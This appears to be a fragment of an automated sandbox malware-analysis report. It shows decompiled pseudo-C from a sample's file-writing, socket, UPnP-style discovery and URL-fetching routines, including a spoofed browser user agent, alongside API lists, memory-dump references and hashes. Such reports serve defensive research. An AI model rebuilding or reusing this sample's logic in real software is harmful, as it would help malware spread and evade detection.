                                                                                                                                                                                                                                                                                    0x0040d20a
                                                                                                                                                                                                                                                                                    0x0040d211
                                                                                                                                                                                                                                                                                    0x0040d323
                                                                                                                                                                                                                                                                                    0x0040d327
                                                                                                                                                                                                                                                                                    0x0040d342
                                                                                                                                                                                                                                                                                    0x0040d349
                                                                                                                                                                                                                                                                                    0x0040d34b
                                                                                                                                                                                                                                                                                    0x0040d361
                                                                                                                                                                                                                                                                                    0x0040d36b
                                                                                                                                                                                                                                                                                    0x0040d36b
                                                                                                                                                                                                                                                                                    0x0040d375
                                                                                                                                                                                                                                                                                    0x0040d37a
                                                                                                                                                                                                                                                                                    0x0040d385
                                                                                                                                                                                                                                                                                    0x0040d385
                                                                                                                                                                                                                                                                                    0x0040d22b
                                                                                                                                                                                                                                                                                    0x0040d232
                                                                                                                                                                                                                                                                                    0x0040d319
                                                                                                                                                                                                                                                                                    0x0040d31d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d31d
                                                                                                                                                                                                                                                                                    0x0040d24a
                                                                                                                                                                                                                                                                                    0x0040d251
                                                                                                                                                                                                                                                                                    0x0040d30f
                                                                                                                                                                                                                                                                                    0x0040d313
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d257
                                                                                                                                                                                                                                                                                    0x0040d263
                                                                                                                                                                                                                                                                                    0x0040d26d
                                                                                                                                                                                                                                                                                    0x0040d277
                                                                                                                                                                                                                                                                                    0x0040d27c
                                                                                                                                                                                                                                                                                    0x0040d27f
                                                                                                                                                                                                                                                                                    0x0040d286
                                                                                                                                                                                                                                                                                    0x0040d29f
                                                                                                                                                                                                                                                                                    0x0040d2b9
                                                                                                                                                                                                                                                                                    0x0040d2be
                                                                                                                                                                                                                                                                                    0x0040d2c1
                                                                                                                                                                                                                                                                                    0x0040d2c8
                                                                                                                                                                                                                                                                                    0x0040d2d6
                                                                                                                                                                                                                                                                                    0x0040d2db
                                                                                                                                                                                                                                                                                    0x0040d2ee
                                                                                                                                                                                                                                                                                    0x0040d2f0
                                                                                                                                                                                                                                                                                    0x0040d2f6
                                                                                                                                                                                                                                                                                    0x0040d2fb
                                                                                                                                                                                                                                                                                    0x0040d2fe
                                                                                                                                                                                                                                                                                    0x0040d2fe
                                                                                                                                                                                                                                                                                    0x0040d2f0
                                                                                                                                                                                                                                                                                    0x0040d2c8
                                                                                                                                                                                                                                                                                    0x0040d286
                                                                                                                                                                                                                                                                                    0x0040d309
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d309

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D204
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D225
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D244
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D25D
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D309
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D313
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D31D
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D33C
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D361
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D36B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 171974401-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42738202a373e86da52720a5def95d02706c9cd7ae46f1d94619cfd4c34c3cbf
                                                                                                                                                                                                                                                                                    • Instruction ID: 3921fc4700ee4b190ae2af8b7d894abc0534e186cae3a84a50511f4350192fbd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42738202a373e86da52720a5def95d02706c9cd7ae46f1d94619cfd4c34c3cbf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97512CB5E00208FBDB14DFE4CC59BEEBB74AB48704F208569E611772C0D7B96A45CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040E840(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                                                                                                                                                                                                                    				long _v4;
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t108 = __eax;
                                                                                                                                                                                                                                                                                    				_t106 = __ecx;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0 || __ebx == 0) {
                                                                                                                                                                                                                                                                                    					InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    					_a4 = 1;
                                                                                                                                                                                                                                                                                    					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                                                                                                                                                                                                                    					 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                                    					_a6 = 0;
                                                                                                                                                                                                                                                                                    					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                                    					return _t59;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InterlockedExchange(_t106 + 4, E0040BE60());
                                                                                                                                                                                                                                                                                    				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                                                                                                                                                                                                                    				if(_t64 == 0) {
                                                                                                                                                                                                                                                                                    					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                                                                                                                                                                                                                    							InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                                    							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                                    							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                                    							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                                                                                                                                                                                                                    							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                                    							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                                                                                                                                                                                                                    							return E0040E220(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                                                                                                                                                                                                                    							_push(_t106);
                                                                                                                                                                                                                                                                                    							return E0040E5C0(_t108);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						return InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t73 = _t64 - 1;
                                                                                                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						return _t73;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                                                                                                                                                                                                                    							InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                                                                                                                                                                                                                    							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                                    							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                                    							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                                                                                                                                                                                                                    							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                                    							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                                    							_v8 = _t106 + 8;
                                                                                                                                                                                                                                                                                    							_v4 = __ebx;
                                                                                                                                                                                                                                                                                    							E0040E220(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                                                                                                                                                                                                                    							_t73 = E0040E7D0(_t106);
                                                                                                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                                    								return _t73;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							return InterlockedDecrement(_t106 + 0x21c);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                                                    0x0040e84a
                                                                                                                                                                                                                                                                                    0x0040e84c
                                                                                                                                                                                                                                                                                    0x0040e84e
                                                                                                                                                                                                                                                                                    0x0040e9d6
                                                                                                                                                                                                                                                                                    0x0040e9ed
                                                                                                                                                                                                                                                                                    0x0040e9f2
                                                                                                                                                                                                                                                                                    0x0040ea00
                                                                                                                                                                                                                                                                                    0x0040ea07
                                                                                                                                                                                                                                                                                    0x0040ea0c
                                                                                                                                                                                                                                                                                    0x0040ea19
                                                                                                                                                                                                                                                                                    0x0040ea1f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ea1f
                                                                                                                                                                                                                                                                                    0x0040e866
                                                                                                                                                                                                                                                                                    0x0040e86f
                                                                                                                                                                                                                                                                                    0x0040e872
                                                                                                                                                                                                                                                                                    0x0040e935
                                                                                                                                                                                                                                                                                    0x0040e947
                                                                                                                                                                                                                                                                                    0x0040e950
                                                                                                                                                                                                                                                                                    0x0040e96b
                                                                                                                                                                                                                                                                                    0x0040e983
                                                                                                                                                                                                                                                                                    0x0040e98d
                                                                                                                                                                                                                                                                                    0x0040e994
                                                                                                                                                                                                                                                                                    0x0040e998
                                                                                                                                                                                                                                                                                    0x0040e9a2
                                                                                                                                                                                                                                                                                    0x0040e9b1
                                                                                                                                                                                                                                                                                    0x0040e9c0
                                                                                                                                                                                                                                                                                    0x0040e9d1
                                                                                                                                                                                                                                                                                    0x0040e952
                                                                                                                                                                                                                                                                                    0x0040e952
                                                                                                                                                                                                                                                                                    0x0040e955
                                                                                                                                                                                                                                                                                    0x0040e958
                                                                                                                                                                                                                                                                                    0x0040e966
                                                                                                                                                                                                                                                                                    0x0040e966
                                                                                                                                                                                                                                                                                    0x0040e937
                                                                                                                                                                                                                                                                                    0x0040e946
                                                                                                                                                                                                                                                                                    0x0040e946
                                                                                                                                                                                                                                                                                    0x0040e878
                                                                                                                                                                                                                                                                                    0x0040e878
                                                                                                                                                                                                                                                                                    0x0040e87b
                                                                                                                                                                                                                                                                                    0x0040ea2e
                                                                                                                                                                                                                                                                                    0x0040ea2e
                                                                                                                                                                                                                                                                                    0x0040e881
                                                                                                                                                                                                                                                                                    0x0040e887
                                                                                                                                                                                                                                                                                    0x0040e8a3
                                                                                                                                                                                                                                                                                    0x0040e8b4
                                                                                                                                                                                                                                                                                    0x0040e8cc
                                                                                                                                                                                                                                                                                    0x0040e8d6
                                                                                                                                                                                                                                                                                    0x0040e8e0
                                                                                                                                                                                                                                                                                    0x0040e8e4
                                                                                                                                                                                                                                                                                    0x0040e8e8
                                                                                                                                                                                                                                                                                    0x0040e8fa
                                                                                                                                                                                                                                                                                    0x0040e906
                                                                                                                                                                                                                                                                                    0x0040e90a
                                                                                                                                                                                                                                                                                    0x0040e914
                                                                                                                                                                                                                                                                                    0x0040e91b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e921
                                                                                                                                                                                                                                                                                    0x0040e921
                                                                                                                                                                                                                                                                                    0x0040e92d
                                                                                                                                                                                                                                                                                    0x0040e92d
                                                                                                                                                                                                                                                                                    0x0040e889
                                                                                                                                                                                                                                                                                    0x0040e89b
                                                                                                                                                                                                                                                                                    0x0040e89b
                                                                                                                                                                                                                                                                                    0x0040e887
                                                                                                                                                                                                                                                                                    0x0040e87b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 0040E866
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E890
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E8A3
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040E8B4
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E93B
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 0040EA0C
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 0040EA19
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 26865f6f9a7a2407e5d3755a8cdf3ada0c05da486e3de92f16a63baf35bb6218
                                                                                                                                                                                                                                                                                    • Instruction ID: b9f556da3bb5aac27c1329fbefbdde51c01563ae05ed193aa0a017dd72204b88
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26865f6f9a7a2407e5d3755a8cdf3ada0c05da486e3de92f16a63baf35bb6218
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D951BD75608701ABC704DF29D888B97FBE4BF88314F008A2EE49D93361D775A558CB96
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040C490(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				char _v1028;
                                                                                                                                                                                                                                                                                    				char _v1029;
                                                                                                                                                                                                                                                                                    				intOrPtr _v1036;
                                                                                                                                                                                                                                                                                    				char* _v1040;
                                                                                                                                                                                                                                                                                    				char* _v1044;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t20 = __eax;
                                                                                                                                                                                                                                                                                    				_v1029 = 0;
                                                                                                                                                                                                                                                                                    				_v1036 = 0;
                                                                                                                                                                                                                                                                                    				while(_v1036 < 2) {
                                                                                                                                                                                                                                                                                    					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_t20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_v1029 = 1;
                                                                                                                                                                                                                                                                                    						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                                                                                                                                                                                                                    							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                                                                                                                                                                                                                    							if(_v1040 != 0) {
                                                                                                                                                                                                                                                                                    								_v1044 = _v1040 + 0xa;
                                                                                                                                                                                                                                                                                    								_t29 = E0040B290(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                                                                                                                                                                                                                    								_t37 = _t37 + 8;
                                                                                                                                                                                                                                                                                    								 *_a8 = _t29;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t20 = _v1036 + 1;
                                                                                                                                                                                                                                                                                    					_v1036 = _t20;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v1029;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040c490
                                                                                                                                                                                                                                                                                    0x0040c499
                                                                                                                                                                                                                                                                                    0x0040c4a0
                                                                                                                                                                                                                                                                                    0x0040c4bb
                                                                                                                                                                                                                                                                                    0x0040c4de
                                                                                                                                                                                                                                                                                    0x0040c4e7
                                                                                                                                                                                                                                                                                    0x0040c4f6
                                                                                                                                                                                                                                                                                    0x0040c513
                                                                                                                                                                                                                                                                                    0x0040c527
                                                                                                                                                                                                                                                                                    0x0040c534
                                                                                                                                                                                                                                                                                    0x0040c53f
                                                                                                                                                                                                                                                                                    0x0040c562
                                                                                                                                                                                                                                                                                    0x0040c567
                                                                                                                                                                                                                                                                                    0x0040c56d
                                                                                                                                                                                                                                                                                    0x0040c56d
                                                                                                                                                                                                                                                                                    0x0040c534
                                                                                                                                                                                                                                                                                    0x0040c4e9
                                                                                                                                                                                                                                                                                    0x0040c4ee
                                                                                                                                                                                                                                                                                    0x0040c4ee
                                                                                                                                                                                                                                                                                    0x0040c4b2
                                                                                                                                                                                                                                                                                    0x0040c4b5
                                                                                                                                                                                                                                                                                    0x0040c4b5
                                                                                                                                                                                                                                                                                    0x0040c57d

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C4DE
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040C4EE
                                                                                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C50B
                                                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C521
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040C54E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                                                    • Opcode ID: d874aecdcf10d4b5be9618b38b24f3ae2d323a3f92cb0c3b0d60b3f526243bf0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bedf7fd65d1d668ead3ec736ca13f9a22eb8deece20412d9194f72f96c2fcee
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d874aecdcf10d4b5be9618b38b24f3ae2d323a3f92cb0c3b0d60b3f526243bf0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062142B494022CEBDB20CB64DC85BE97774AB04708F1086E9E709B72C0D7B95AC68F5C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D440(char* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v9;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_v24 = 4;
                                                                                                                                                                                                                                                                                    						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                                                                                                                                                                                                                    						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                                                                                                                                                                                                                    							 *_a8 = _v20;
                                                                                                                                                                                                                                                                                    							_v9 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				return _v9;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040d446
                                                                                                                                                                                                                                                                                    0x0040d45d
                                                                                                                                                                                                                                                                                    0x0040d464
                                                                                                                                                                                                                                                                                    0x0040d47c
                                                                                                                                                                                                                                                                                    0x0040d483
                                                                                                                                                                                                                                                                                    0x0040d485
                                                                                                                                                                                                                                                                                    0x0040d49f
                                                                                                                                                                                                                                                                                    0x0040d4ac
                                                                                                                                                                                                                                                                                    0x0040d4be
                                                                                                                                                                                                                                                                                    0x0040d4c0
                                                                                                                                                                                                                                                                                    0x0040d4c0
                                                                                                                                                                                                                                                                                    0x0040d4c8
                                                                                                                                                                                                                                                                                    0x0040d4c8
                                                                                                                                                                                                                                                                                    0x0040d4d2
                                                                                                                                                                                                                                                                                    0x0040d4d2
                                                                                                                                                                                                                                                                                    0x0040d4dd
                                                                                                                                                                                                                                                                                    0x0040d4e9

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D457
                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D476
                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D49F
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D4C8
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D4D2
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D4DD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36, xrefs: 0040D452
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    • API String ID: 2743515581-858318475
                                                                                                                                                                                                                                                                                    • Opcode ID: bf6bfaf4f45310fce9545a939de9a762d1e78cec5d6cbb91b294f9239cf924bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 741b2aa36f5f9633f3a5325d1023e1587c91f2e0dd76465297faea143a49f62d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6bfaf4f45310fce9545a939de9a762d1e78cec5d6cbb91b294f9239cf924bb
